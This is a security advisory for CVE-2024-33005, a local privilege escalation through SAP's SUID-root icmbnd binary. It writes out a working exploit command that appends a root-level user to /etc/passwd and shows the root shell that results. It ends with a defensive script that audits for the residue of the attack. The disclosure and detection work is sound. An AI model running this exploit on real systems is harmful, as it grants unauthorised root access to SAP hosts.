Local Privilege Escalation in SAP

31/10/2024 - Download

Product: SAP External Bind

Severity: Medium

Fixed Version(s): Security Note 3438085

Affected Version(s): SAP External Bind 7.77

CVE Number: CVE-2024-33005

Authors: Julien Egloff

Description

Presentation

With the SAP S/4HANA family, SAP is providing a new generation of business applications – best-of-breed enterprise software for big data, designed to help you run simple in the digital economy.

The SAP S/4HANA family is fully built on the in-memory platform SAP HANA. Using the advanced potential of SAP HANA, these products are designed for your digital business and provide instant insight into what is going on in your business by using a single source of truth, real-time processes as well as dynamic planning and analysis. With SAP Fiori user experience and a less complex data model, they are designed to run simple, and in parallel reduce the data footprint of your company.

Issue(s)

The icmbnd binary shipped with some SAP distributions has the SUID bit set and can be manipulated into writing to arbitrary files, which allows a local user to escalate privileges to root.

Timeline

Date        Description
2024.02.07  Advisory sent to SAP
2024.08.13  Security note 3438085 released
2024.10.31  Public release

Technical details

Local privilege escalation

Description

The icmbnd binary is present on some SAP systems at the following path: /sapmnt/{SID}/exe/uc/linuxx86_64/icmbnd. By default it has the following permissions, which allow members of the sapsys group to execute it as root (set-user-ID root):

$ ls -l /sapmnt/{INSTANCEID}/exe/uc/linuxx86_64/icmbnd
-rwsr-x--- 1 root sapsys 2718568 Jan 21  2023 /sapmnt/{INSTANCEID}/exe/uc/linuxx86_64/icmbnd

The following options are available:

$ ./icmbnd -h
Usage: icmbnd <options>
with the following options:
-v[ersion]                      display version info and exit
-S <ServerPort>                 listen port of the controlling program (eg. icman)
-H <hostname>                   hostname to bind port to (default: all names)
-l <port for listen>            servicename or portnumber
-p <protocol>                   protocol to use (HTTP, HTTPS, SMTP)
-i <virt host idx>                      index of the virtual host(default: -1)
-k <keep_alive_timeout>         keep alive timeout for this port
-K <proc_timeout>               Processing timeout for this port
-c verify_client <val>          SSL client verification option (0,1,2)
-t <trace_level>                tracelevel (default:1)
-f <trace_file>]                name of the tracefile (default: dev_icmbnd)
-apptrc                         append to existing tracefile

The -f and -apptrc options let the caller name an arbitrary trace file and append to it instead of truncating it. When an invalid value is supplied for one of the mandatory options, the resulting error message, including the supplied value, is written to that trace file.

Impact

This behavior can be abused to append arbitrary data to sensitive files, for example a new root-level user to /etc/passwd:

$ ./icmbnd -S '443' -f /etc/passwd -apptrc -p HTTP -l '443
> synacktiv:[...]:0:0::/root:/bin/sh
> abc'
icmbnd: NiListen failed for 443
synacktiv:[...]:0:0::/root:/bin/sh
abc (rc=-8): NIEINVAL
IcmBndConnect: IcmConnect to port 443 failed (rc=-10)
icmbnd: IcmBndConnect (rc=-10)

The content of /etc/passwd is then verified:

$ cat /etc/passwd
[...]
{SID}adm:x:20020:1002:SAP System Administrator:/home/{SID}adm:/bin/csh

---------------------------------------------------
trc file: "passwd", trc level: 1, release: "789"
---------------------------------------------------

[Thr 140102972481920] Wed Feb  7 10:37:06 2024
[Thr 140102972481920] systemid:   390 (AMD/Intel x86_64 with Linux)
[Thr 140102972481920] version:    7890
[Thr 140102972481920] patchlevel: 0    (server: 0)
[Thr 140102972481920] patchno:    69    (server: 74)
[Thr 140102972481920] intno       0    (server: 0)
[Thr 140102972481920] make:       multithreaded, Unicode, 64 BIT
[Thr 140102972481920] pid:        29938
[Thr 140102972481920] 
[Thr 140102972481920] *** WARNING => NiServerHandle: parameter invalid (strlenU(pServName) >= NI_MAX_SERVNAME_LEN) [nixx.c       263]
[Thr 140102972481920] *** ERROR => icmbnd: NiListen failed for 443
synacktiv:[...]:0:0::/root:/bin/sh
[...]

Even though the surrounding trace lines do not match the expected format of /etc/passwd entries, the new user can still log in:

$ su - synacktiv
Password: 
# id
uid=0(synacktiv) gid=0(root) groups=0(root)
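The trace residue shown above gives a defender something concrete to look for. The following added example (not part of the Synacktiv advisory) scans a passwd-style file for ICM trace banners and for uid-0 entries other than root, and checks whether a file mode carries the SUID bit, as icmbnd does by default; the sample file content and the password-hash placeholder are constructed.

```python
"""Audit helpers for the icmbnd trace-file append described in the advisory.

Added example, not code from the advisory or from SAP. Assumptions: the
sample passwd content below is constructed to mimic the post-exploitation
state shown above, and the hash field is a placeholder.
"""
import os
import re
import stat
from typing import Dict, List

# Constructed sample: a normal file with icmbnd trace output and a rogue uid-0 user appended.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
sapadm:x:20020:1002:SAP System Administrator:/home/sapadm:/bin/csh
---------------------------------------------------
trc file: "passwd", trc level: 1, release: "789"
---------------------------------------------------
[Thr 140102972481920] *** ERROR => icmbnd: NiListen failed for 443
synacktiv:$6$placeholder:0:0::/root:/bin/sh
"""

# Lines an ICM trace writer emits: thread-tagged records, the "trc file" banner, and its dashed rules.
TRACE_MARKERS = re.compile(r'^(\[Thr \d+\]|trc file:|-{10,}$)')


def audit_passwd(text: str) -> Dict[str, List[str]]:
    """Classify suspicious lines in passwd-style content.

    Returns trace_residue (raw lines), extra_uid0 (user names with uid 0 that
    are not 'root') and malformed (non-trace lines without seven fields).
    """
    findings: Dict[str, List[str]] = {"trace_residue": [], "extra_uid0": [], "malformed": []}
    for line in text.splitlines():
        if not line.strip():
            continue
        if TRACE_MARKERS.match(line):
            findings["trace_residue"].append(line)
            continue
        fields = line.split(":")
        if len(fields) != 7:  # name:pw:uid:gid:gecos:home:shell
            findings["malformed"].append(line)
            continue
        name, _, uid = fields[0], fields[1], fields[2]
        if uid == "0" and name != "root":
            findings["extra_uid0"].append(name)
    return findings


def has_suid(st_mode: int) -> bool:
    """True when the set-user-ID bit is present in a stat st_mode value."""
    return bool(st_mode & stat.S_ISUID)


def binary_is_suid(path: str) -> bool:
    """Convenience wrapper for a real file, e.g. the icmbnd path from the advisory."""
    return has_suid(os.stat(path).st_mode)
```

Run audit_passwd over the contents of /etc/passwd on an SAP host; any trace_residue or extra_uid0 finding is worth an incident ticket, and binary_is_suid on the icmbnd path tells you whether the note 3438085 fix has been applied in a way that drops the bit.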